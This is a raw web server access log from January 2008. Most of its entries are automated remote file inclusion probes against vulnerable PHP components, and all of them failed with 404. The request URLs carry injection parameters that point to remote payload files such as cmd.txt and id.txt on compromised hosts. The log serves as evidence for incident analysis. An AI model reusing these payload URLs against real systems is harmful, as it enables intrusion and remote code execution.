125.245.27.141 - - [12/Jan/2008:04:50:16 -0800] "GET /logs/access_070712.log/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
143.248.135.48 - - [12/Jan/2008:04:50:45 -0800] "GET /logs/access.log/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.224.45 - - [12/Jan/2008:04:50:52 -0800] "GET /logs/access_071112.log/mcf.php?content=http://www.gruppomulti.ch/documents/coges.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.808" "www.projectpr.com"
206.55.125.228 - - [12/Jan/2008:04:50:57 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
206.55.125.228 - - [12/Jan/2008:04:52:18 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:04:53:11 -0800] "GET /logs/access.log///modules/xfsection/modify.php?dir_module=http://www.eavi.no/script/djd.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:04:53:11 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://www.eavi.no/script/djd.jpg??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:04:53:12 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://www.eavi.no/script/djd.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:04:53:28 -0800] "GET /logs/access.log///modules/xfsection/modify.php?dir_module=http://www.eavi.no/script/djd.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:04:53:29 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://www.eavi.no/script/djd.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:04:53:29 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://www.eavi.no/script/djd.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
217.110.144.106 - - [12/Jan/2008:04:54:45 -0800] "GET /logs/access_070812.log//modules/vwar/admin/admin.php?vwar_root=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
217.110.144.106 - - [12/Jan/2008:04:54:46 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:04:54:51 -0800] "GET /logs/access.log///modules/xfsection/modify.php?dir_module=http://www.events.rustygrape.com//includes/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:04:54:52 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://www.events.rustygrape.com//includes/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:04:54:53 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://www.events.rustygrape.com//includes/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:04:55:07 -0800] "GET /logs/access.log///modules/xfsection/modify.php?dir_module=http://www.events.rustygrape.com//includes/djd.txt??? HTTP/1.1" 404 292 "-" "libwww-perl/5.805" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:04:55:07 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://www.events.rustygrape.com//includes/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:04:55:08 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://www.events.rustygrape.com//includes/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.194.124.84 - - [12/Jan/2008:05:00:22 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
213.194.124.84 - - [12/Jan/2008:05:00:22 -0800] "GET //skin/zero_vote/error.php?dir=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.803" "www.projectpr.com"
213.194.124.84 - - [12/Jan/2008:05:00:23 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.803" "www.projectpr.com"
213.194.124.84 - - [12/Jan/2008:05:02:17 -0800] "GET /logs/access_070812.log//modules/vwar/admin/admin.php?vwar_root=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
213.194.124.84 - - [12/Jan/2008:05:02:18 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
213.194.124.84 - - [12/Jan/2008:05:02:18 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
199.237.204.148 - - [12/Jan/2008:05:08:16 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://theninjalegion.com/safe.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
199.237.204.148 - - [12/Jan/2008:05:08:16 -0800] "GET //skin/zero_vote/error.php?dir=http://theninjalegion.com/safe.txt?? HTTP/1.0" 404 255 "-" "libwww-perl/5.53" "www.projectpr.com"
199.237.204.148 - - [12/Jan/2008:05:08:16 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://theninjalegion.com/safe.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
80.168.55.27 - - [12/Jan/2008:05:09:09 -0800] "GET /logs/access_071012.log/index2.php?x=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
80.168.55.27 - - [12/Jan/2008:05:09:09 -0800] "GET /logs/index2.php?x=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 274 "-" "libwww-perl/5.808" "www.projectpr.com"
89.108.85.55 - - [12/Jan/2008:05:11:37 -0800] "GET /logs/access_070912.log///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.108.85.55 - - [12/Jan/2008:05:11:37 -0800] "GET ///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.108.85.55 - - [12/Jan/2008:05:11:38 -0800] "GET /logs///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
199.237.204.148 - - [12/Jan/2008:05:14:49 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
199.237.204.148 - - [12/Jan/2008:05:14:49 -0800] "GET //skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
66.98.150.12 - - [12/Jan/2008:05:14:49 -0800] "GET /logs/access.log/index.php?pagina=http://www.gatecrashing.net/template/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
199.237.204.148 - - [12/Jan/2008:05:14:49 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
66.98.150.12 - - [12/Jan/2008:05:14:49 -0800] "GET /index.php?pagina=http://www.gatecrashing.net/template/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.98.150.12 - - [12/Jan/2008:05:14:50 -0800] "GET /logs/index.php?pagina=http://www.gatecrashing.net/template/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
89.108.85.55 - - [12/Jan/2008:05:16:48 -0800] "GET /logs/access_071012.log///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.131.235.226 - - [12/Jan/2008:05:19:27 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://misterbit.altervista.org/ftp-r0x/scan/pr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.projectpr.com"
213.131.235.226 - - [12/Jan/2008:05:19:27 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://misterbit.altervista.org/ftp-r0x/scan/pr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.projectpr.com"
66.7.197.76 - - [12/Jan/2008:05:20:57 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://misterbit.altervista.org/ftp-r0x/scan/pr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.projectpr.com"
66.7.197.76 - - [12/Jan/2008:05:20:57 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://misterbit.altervista.org/ftp-r0x/scan/pr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.projectpr.com"
72.30.179.219 - - [12/Jan/2008:05:21:27 -0800] "GET /logs/access_061012.log HTTP/1.0" 200 540177 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
217.110.144.106 - - [12/Jan/2008:05:24:24 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.69" "www.projectpr.com"
76.248.166.46 - - [12/Jan/2008:05:24:38 -0800] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
89.108.85.55 - - [12/Jan/2008:05:24:40 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 287 "-" "libwww-perl/5.805" "www.projectpr.com"
89.108.85.55 - - [12/Jan/2008:05:24:41 -0800] "GET //skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.108.85.55 - - [12/Jan/2008:05:24:41 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.169.134.164 - - [12/Jan/2008:05:25:13 -0800] "GET /logs/access_070812.log/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.169.143.232 - - [12/Jan/2008:05:25:13 -0800] "GET /logs/access_070812.log/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
81.169.134.164 - - [12/Jan/2008:05:25:13 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 304 "-" "libwww-perl/5.803" "www.projectpr.com"
81.169.143.232 - - [12/Jan/2008:05:25:13 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
81.169.134.164 - - [12/Jan/2008:05:25:13 -0800] "GET /logs/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.169.143.232 - - [12/Jan/2008:05:25:13 -0800] "GET /logs/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
74.6.8.120 - - [12/Jan/2008:05:26:24 -0800] "GET /logs/access_070912.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
125.231.0.227 - - [12/Jan/2008:05:27:34 -0800] "GET /logs/access_070612.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
125.231.0.227 - - [12/Jan/2008:05:27:34 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
125.231.0.227 - - [12/Jan/2008:05:27:35 -0800] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 289 "-" "libwww-perl/5.79" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:05:28:34 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 287 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:05:28:34 -0800] "GET //skin/zero_vote/error.php?dir=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:05:28:34 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
125.231.0.227 - - [12/Jan/2008:05:28:49 -0800] "GET /logs/access.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
66.7.209.233 - - [12/Jan/2008:05:32:51 -0800] "GET /logs/access_070812.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.7.209.233 - - [12/Jan/2008:05:32:51 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.7.209.233 - - [12/Jan/2008:05:32:51 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.7.209.233 - - [12/Jan/2008:05:33:53 -0800] "GET /logs/access_070912.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
76.248.166.46 - - [12/Jan/2008:05:34:14 -0800] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.79" "www.projectpr.com"
208.53.147.60 - - [12/Jan/2008:05:35:10 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.projectpr.com"
208.53.147.60 - - [12/Jan/2008:05:35:10 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.projectpr.com"
125.231.0.227 - - [12/Jan/2008:05:35:38 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
125.231.0.227 - - [12/Jan/2008:05:35:38 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
125.231.0.227 - - [12/Jan/2008:05:35:39 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
74.52.9.218 - - [12/Jan/2008:05:36:08 -0800] "GET /logs/access.log/index.php?pagina=http://www.gatecrashing.net/images/al.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
74.52.9.218 - - [12/Jan/2008:05:36:09 -0800] "GET /index.php?pagina=http://www.gatecrashing.net/images/al.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
74.52.9.218 - - [12/Jan/2008:05:36:09 -0800] "GET /logs/index.php?pagina=http://www.gatecrashing.net/images/al.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
193.252.149.15 - - [12/Jan/2008:05:37:40 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.projectpr.com"
193.252.149.15 - - [12/Jan/2008:05:37:46 -0800] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.projectpr.com"
67.19.3.34 - - [12/Jan/2008:05:38:52 -0800] "GET /logs/access.log///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
67.19.3.34 - - [12/Jan/2008:05:38:52 -0800] "GET /logs/access.log///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
67.19.3.34 - - [12/Jan/2008:05:38:52 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
67.19.3.34 - - [12/Jan/2008:05:38:52 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
67.19.3.34 - - [12/Jan/2008:05:38:52 -0800] "GET /logs///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.808" "www.projectpr.com"
67.19.3.34 - - [12/Jan/2008:05:38:52 -0800] "GET /logs///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.7.209.233 - - [12/Jan/2008:05:42:20 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.7.209.233 - - [12/Jan/2008:05:42:21 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.7.209.233 - - [12/Jan/2008:05:42:21 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:05:42:37 -0800] "GET /logs/access.log///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:05:42:37 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:05:42:37 -0800] "GET /logs///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.805" "www.projectpr.com"
67.19.3.34 - - [12/Jan/2008:05:42:56 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
67.19.3.34 - - [12/Jan/2008:05:42:57 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:05:43:01 -0800] "GET /logs/access.log///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:05:43:01 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:05:43:01 -0800] "GET /logs///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:05:43:29 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:05:43:29 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
217.110.144.106 - - [12/Jan/2008:05:45:16 -0800] "GET /logs/access_070912.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
217.110.144.106 - - [12/Jan/2008:05:45:17 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
85.214.29.90 - - [12/Jan/2008:05:47:15 -0800] "GET /logs/access_070812.log//modules/vwar/admin/admin.php?vwar_root=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 298 "-" "libwww-perl/5.69" "www.projectpr.com"
85.214.29.90 - - [12/Jan/2008:05:47:16 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
